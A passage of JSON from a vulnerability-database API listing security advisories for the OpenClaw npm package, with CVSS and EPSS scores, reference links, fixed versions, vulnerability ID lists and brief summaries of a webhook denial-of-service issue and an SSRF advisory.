                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cmfr-9m2r-xwhq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42431",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42431"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:12:10Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-persistent-profile-mutation-via-node-invoke-browser-proxy-bypass"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cmfr-9m2r-xwhq",
                    "reference_id": "GHSA-cmfr-9m2r-xwhq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cmfr-9m2r-xwhq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42431",
                "GHSA-cmfr-9m2r-xwhq"
            ],
            "risk_score": 3.6,
            "exploitability": "0.5",
            "weighted_severity": "7.3",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ma62-gtan-97au"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90122?format=api",
            "vulnerability_id": "VCID-mcz5-wgu1-z7g7",
            "summary": "OpenClaw: LINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n## Summary\nLINE webhook handler lacks shared pre-auth concurrency budget before signature verification\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 lacks a shared pre-auth concurrency budget on the public LINE webhook path, but the effect is bounded transient availability loss only, so low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `57c47d8c7fbf5a2e70cc4dec2380977968903cad` — 2026-03-31T19:34:25+09:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41343",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35317",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35292",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.35328",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41343"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/57c47d8c7fbf5a2e70cc4dec2380977968903cad"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qcc3-jqwp-5vh2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41343",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41343"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:30:05Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-line-webhook-handler-pre-auth-concurrency"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qcc3-jqwp-5vh2",
                    "reference_id": "GHSA-qcc3-jqwp-5vh2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qcc3-jqwp-5vh2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41343",
                "GHSA-qcc3-jqwp-5vh2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mcz5-wgu1-z7g7"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89346?format=api",
            "vulnerability_id": "VCID-mggy-bv5s-5uax",
            "summary": "Duplicate Advisory: OpenClaw: SSRF via Unguarded Configured Base URLs in Multiple Channel Extensions (Incomplete Fix for CVE-2026-28476)\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rhfg-j8jq-7v2h. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 contains a server-side request forgery vulnerability in multiple channel extensions that fail to properly guard configured base URLs against SSRF attacks. Attackers can exploit unprotected fetch() calls against configured endpoints to rebind requests to blocked internal destinations and access restricted resources.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/f92c92515bd439a71bd03eb1bc969c1964f17acf"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rhfg-j8jq-7v2h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35629"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-configured-base-urls-in-channel-extensions"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8j7f-g9gv-7jhc",
                    "reference_id": "GHSA-8j7f-g9gv-7jhc",
                    "reference_type": "",
                    "scores": [
                        {
